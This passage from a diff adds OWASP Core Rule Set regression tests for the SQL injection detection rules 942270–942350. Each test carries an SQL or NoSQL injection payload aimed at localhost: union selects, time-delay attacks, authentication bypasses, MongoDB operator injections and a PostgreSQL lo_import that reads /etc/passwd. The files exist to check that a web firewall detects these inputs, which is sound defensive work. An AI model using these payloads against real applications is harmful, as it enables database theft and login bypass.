@@ -0,0 +1,39 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942270.yaml +tests: + - test_title: 942270-1 + desc: "basic sql injection. Common attack string for mysql, oracle and others" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=union%20select%20col%20from" + version: HTTP/1.0 + output: + log_contains: id "942270" + - test_title: 942270-2 + desc: "Status Page Test - SQL injection test with Xunionselectfrom (missing word boundary at the beginning)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=Xunionselectfrom" + version: HTTP/1.0 + output: + log_contains: id "942270" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml new file mode 100644 index 00000000..c0f6bff5 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml 
@@ -0,0 +1,40 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942280.yaml +tests: + - test_title: 942280-1 + desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=select%20pg_sleep" + version: HTTP/1.0 + output: + log_contains: id "942280" + - test_title: 942280-2 + desc: "SQL Server waitfor delay attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" + version: HTTP/1.0 + output: + log_contains: id "942280 diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml new file mode 100644 index 00000000..f93a3a09 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml 
@@ -0,0 +1,155 @@ +--- +meta: + author: csanders-git + description: None + enabled: true + name: 942290.yaml +tests: + - test_title: 942290-1 + desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: /mongo/show.php?u_id[$ne]=2 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: id "942290" + - test_title: 942290-2 + desc: "basic MongoDB NOSQL injection attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?mongoQ=%5b%24lte%5dasdfsd" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_title: 942290-3 + desc: "basic MongoDB NOSQL injection attempts 2" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_title: 942290-4 + desc: "basic MongoDB NOSQL injection attempts 3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_title: 942290-5 + desc: "basic MongoDB NOSQL injection attempts 4" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: 
"*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$not": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-6 + desc: "basic MongoDB NOSQL injection attempts 5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$nor": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-7 + desc: "basic MongoDB NOSQL injection attempts 6" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$where": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-8 + desc: "basic MongoDB NOSQL injection attempts 7" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$elemMatch": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-9 + desc: "basic MongoDB NOSQL injection attempts 8" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$text": "foo"}' + output: + log_contains: id "942290" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml new file mode 100644 index 00000000..383c0c4c --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml 
@@ -0,0 +1,55 @@ +--- +meta: + author: "Christian S.J. Peron, Franziska Bühler" + description: None + enabled: true + name: 942300.yaml +tests: + - test_title: 942300-1 + desc: "MySQL comments, conditions and ch(a)r injectionss" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log_contains: id "942300" + - test_title: 942300-2 + desc: "MySQL comments, conditions and ch(a)r injectionss" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log_contains: id "942300" + - test_title: 942300-3 + desc: "No false positives with for. Issue #2007" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=booked%20for%202021%28including%202020" + version: HTTP/1.0 + output: + no_log_contains: id "942300" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml new file mode 100644 index 00000000..17ede052 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml 
@@ -0,0 +1,63 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942310.yaml +tests: + - test_title: 942310-1 + desc: | + Chained SQL injection attempts 2/2. + This test originally checked the expression `[\"'`]\s+and\s*?=\W`. We opted to remove that expression as it + does not appear to match anything useful (https://github.com/coreruleset/coreruleset/issues/2118). + This test now checks that no match occurs for something that would have matched the original expression. + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%22%27%20and%20%3d%20bar" + version: HTTP/1.0 + output: + no_log_contains: id "942310" + - test_title: 942310-2 + desc: | + Chained SQL injection attempts 2/2. + This test checks for a positive match of `\(\s*?select\s*?\w+\s*?\(`. + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" + version: HTTP/1.0 + output: + log_contains: id "942310" + - test_title: 942310-3 + desc: | + Chained SQL injection attempts 2/2. + This test checks for a positive match of `order\s+by\s+if\w*?\s*?\(`. + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" + version: HTTP/1.0 + output: + log_contains: id "942310" 
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml new file mode 100644 index 00000000..bb8be2c8 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml 
@@ -0,0 +1,218 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen" + description: None + enabled: true + name: 942320.yaml +tests: + - test_title: 942320-1 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=procedure%20analyse%20%28" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-2 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=exec+%28%40%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-3 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=declare+%40b%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-4 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-5 
+ desc: "Detects PostgreSQL data conversion with ::int" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=password::int" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-6 + desc: "Detects PostgreSQL data conversion with ::bool" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-7 + desc: "Detects PostgreSQL bypass attempt with div(23,-2) - issue #2910" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=div(23,-2)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-8 + desc: "Detects PostgreSQL bypass attempt with div (23.23 , 2) - issue #2910" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=div+(23.23+,+2)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-9 + desc: "Detects PostgreSQL bypass attempt lo_import'( - issue #2912" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-10 + desc: "Detects PostgreSQL bypass attempt with lo_get(16400) - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=lo_get(16400)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-11 + desc: "Detects PostgreSQL bypass attempt function(foo)::text - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=function(foo)::text" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-12 + desc: "Detects PostgreSQL bypass attempt function(foo)::bigint - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=function(foo)::bigint" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-13 + desc: "Detects PostgreSQL bypass attempt function(foo)::double precision - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + 
port: 80 + uri: "/index.php?id=function(foo)::double%20precision" + version: HTTP/1.0 + output: + log_contains: id "942320" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml new file mode 100644 index 00000000..ae9973e9 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml @@ -0,0 +1,37 @@ +--- +meta: + author: "Franziska Bühler" + enabled: true + name: 942321.yaml +tests: + - test_title: 942321-1 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16200),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942321" + - test_title: 942321-2 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: overlay(password placing $$$$ from 1)::int and id=1 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942321" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml new file mode 100644 index 00000000..6e72d50f --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml 
@@ -0,0 +1,89 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942330.yaml +tests: + - test_title: 942330-1 + desc: "classic SQL injection probings 1/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%22%27&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_title: 942330-2 + desc: "Test first backslash match ([\"'`\x5c]*?)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=\\\"1 or 1-" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_title: 942330-3 + desc: "Test second backslash match (\x5cx(?:23|27|3d))" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=\\x23" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_title: 942330-4 + desc: "Test false positive issue nr. 3205" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: | + "var=05111222333 + andy.surname@somedomain.com" + version: HTTP/1.0 + output: + no_log_contains: id "942330" + - test_title: 942330-5 + desc: "Test false positive issue nr. 
3205" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=05111222333 andy.surname@somedomain.com" + version: HTTP/1.0 + output: + no_log_contains: id "942330" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml new file mode 100644 index 00000000..18ca873c --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml 
@@ -0,0 +1,191 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942340.yaml +tests: + - test_title: 942340-1 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # in ( select * from + uri: "/?var=in%20%28%20select%20%2a%20from" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-2 + desc: "SQLite authentication bypass with except select" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except \tselect.1,2 + uri: "/?var=except%20%09select.1%2C2" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-3 + desc: "SQLite authentication bypass with except values" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except values (1,2) + uri: "/?var=except%20values(1%2C2)" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-4 + desc: "true-negative except selecting" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except selecting + uri: "/?var=except%20selecting" + version: HTTP/1.0 + output: + no_log_contains: id "942340" + - test_title: 942340-5 + desc: "basic SQL authentication 
bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=x'%20or%20array[id]%20is%20not%20null--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-6 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=x'%20or%20email~all(array[email]);analyze--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-7 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='%20and%20email%20not%20similar%20to%20id--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-8 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='%20or%20true;%20foo" + version: HTTP/1.0 + output: + log_contains: id "942340" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: 
POST + port: 80 + uri: "/" + data: "email='%20or%20false;%20foo" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-9 + desc: "basic SQL authentication bypass attempts 3/3 (no whitespace between operator)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='||true" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-10 + desc: "SQL Auth Bypass FP test (invalid operator without whitespace)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='ortrue" + version: HTTP/1.0 + output: + no_log_contains: id "942340" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml new file mode 100644 index 00000000..c9c78040 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml 
@@ -0,0 +1,74 @@ +--- +meta: + author: "Christian S.J. Peron, Franziska Bühler" + description: None + enabled: true + name: 942350.yaml +tests: + - test_title: 942350-1 + desc: "MySQL UDF injection and other data/structure manipulation" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ; insert INTO table (word) VALUES('dfsd') + uri: "/?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" + version: HTTP/1.0 + output: + log_contains: id "942350" + - test_title: 942350-2 + desc: "Fix for FP reported in GitHub issue 1587" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ;insertion_424242 + uri: "/?var=%3Binsertion_424242" + version: HTTP/1.0 + output: + no_log_contains: id "942350" + - test_title: 942350-3 + desc: "MySQL create function injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); + uri: "/?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" + version: HTTP/1.0 + output: + log_contains: id "942350" + - test_title: 942350-4 + desc: "Status Page Test - MySQL injection with ;truncate[xx" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=;truncate[xx" + version: HTTP/1.0 + output: + log_contains: id "942350" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml new file mode 100644 index 00000000..138c9002 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml 
